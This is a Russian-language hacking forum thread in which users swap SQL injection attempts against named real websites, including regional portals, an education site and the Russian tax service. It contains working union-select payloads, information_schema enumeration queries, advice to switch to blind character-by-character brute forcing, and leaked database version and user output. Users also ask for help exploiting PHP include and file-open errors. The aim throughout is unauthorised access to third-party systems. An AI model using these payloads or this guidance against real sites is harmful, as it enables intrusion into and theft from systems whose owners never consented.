нашел сайтец при www.site.ru/id=1' при отправке такого запроса он мен выдает вот это Microsoft VBScript runtime error '800a000d' Type mismatch: '[string: "'"]' /support/includes/inc_news.asp, line 82 я понял что это mssql но возможно ли тут инъекция, очень сложный вопрос так как я попробовал узнаь версию он мне выдал вот что Microsoft VBScript runtime error '800a000d' Type mismatch: '[string: "@@version--"]' /support/includes/inc_news.asp, line 82 я попробовал множество вариантов , прочитал статьи и нашел что базы данных Vbscript впринципе невозможно взломать,... но надежда умирает последней может вы что то можете предложить... спасибо саму ссылку пока не даю так как , разъяснить надо поподробнее если уже идей не будет дам и ссылку... спасибо заранее
Объясните ламеру возможно ли это как-то использовать в своих целях? http://forums.saratov.ru/index.php?act=members&st=%20-1 и http://forums.saratov.ru/ips_kernel/PEAR/Text/Diff3.php
я конечно плохо разбираюсь но попервой ссылке если ты поймешь что там написано , может это и ошибка , хотя врядли ничего по ней не сделаешь... а вот по второй ,это либо админ подлный дибил и с ошибкой фоурм, либо там инклуд (php инклуд) статьи есть на ачате.... хотя я плохо разбираюсь в инкоуде так что могу ошибится... просто сомнения из за того что ты не задал лишних параметров..
Вот что я нашел по Саратову http://www.saratov.ru/gallery/?show=gal&id=-3+union+select+1,22222/* Таблицы не подобрал... пробовал mysql.user и ibf_members может руки не оттуда?..
Code: http://www.saratov.ru/gallery/?show=gal&id=-1+union+select+1,2,выводится,4,5,6/* saratov gallery@localhost 4.0.17
http://www.edu.ru/index.php?page_id=50&op=word&wid=-1' Выодит mysq еррор....начинаю перебор - он мне аццес денайед((
Code: .php?rid=-1+union+select+1,2,3,column_name,5,6,7,8,9,1,2+from+information_schema.columns+where+table_name='users'+limit+1,1/* Code: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'users\' limit 1,1/*' at line 5 Он ' фильтрует? Таблица users 100% существует.
Code: http://www.edu.ru/index.php?page_id=50&op=word&wid=581 and substring(version(),1,1)=4 там union заменяется на union% и у тя всегда будет ошибка синтаксиса. юзай посимвольный брут
http://www.turclubmai.ru/heading/155/index.php?group=asda&id_top_name=' ни фига ниче не получается сделать пробовал найти количество столбоц , очень странно все короче... посомтрите пожлауйста... в че же я ошибаюсь ну к примеру делаю запрос такой http://www.turclubmai.ru/heading/155/index.php?group=asda&id_top_name=1'+union+select+1/* он мне выводит вот это You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' union select 1/*' at line 1 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /www/vhosts/turclubmai.ru/html/heading/index.txt on line 46 странно неправда ли , я короче таким образом дошел до 70 ...)) ни фига ничего а order by даже на 200 писал ошибку и даже на 1 ... не знаю короче помогите..
Taylorith http://www.turclubmai.ru/heading/155/index.php?group=asda&id_top_name=-111111111111+union+select+1,version()+/* 5.0.24-standard db_turclubmai turclubmai@localhost
Хотел бы узнать если можно что то сделать с данной ошибкой,которую получаю на сайте,после добавки ' Code: http://www.bezeqint.net/PageText.aspx?cc=010202020311'
прива вот покопался в одном сайте адрес вот такого типа http://www.site.ru/document.php?id=25609'&topic=тут топик естесно ) потсавил ковычку и высветилось вот это Warning: fopen(/usr/data/www2.nalog.ru/htdocs/mw/root//secure.log) [function.fopen]: failed to open stream: Permission denied in /usr/data/www2.nalog.ru/htdocs/mw/libs/frontend_queries.php on line 15 я знаком тока сос кулем... помогите заюзщать данную ошибку мне незнакомую...лучше скажите что это конкретно означает , к каким видам уязвимости относится и можно ли что нить сделать..... если идей больше не будет скажите скину сайт в ПМ.
А не страшно nalog.ru ломать? ) ФНС РФ как никак ) и посмотри на что он ругается: secure.log Если бы не ругался он, то тебя записали бы и потом пришли в гости. А так просто прав нет на запись и все
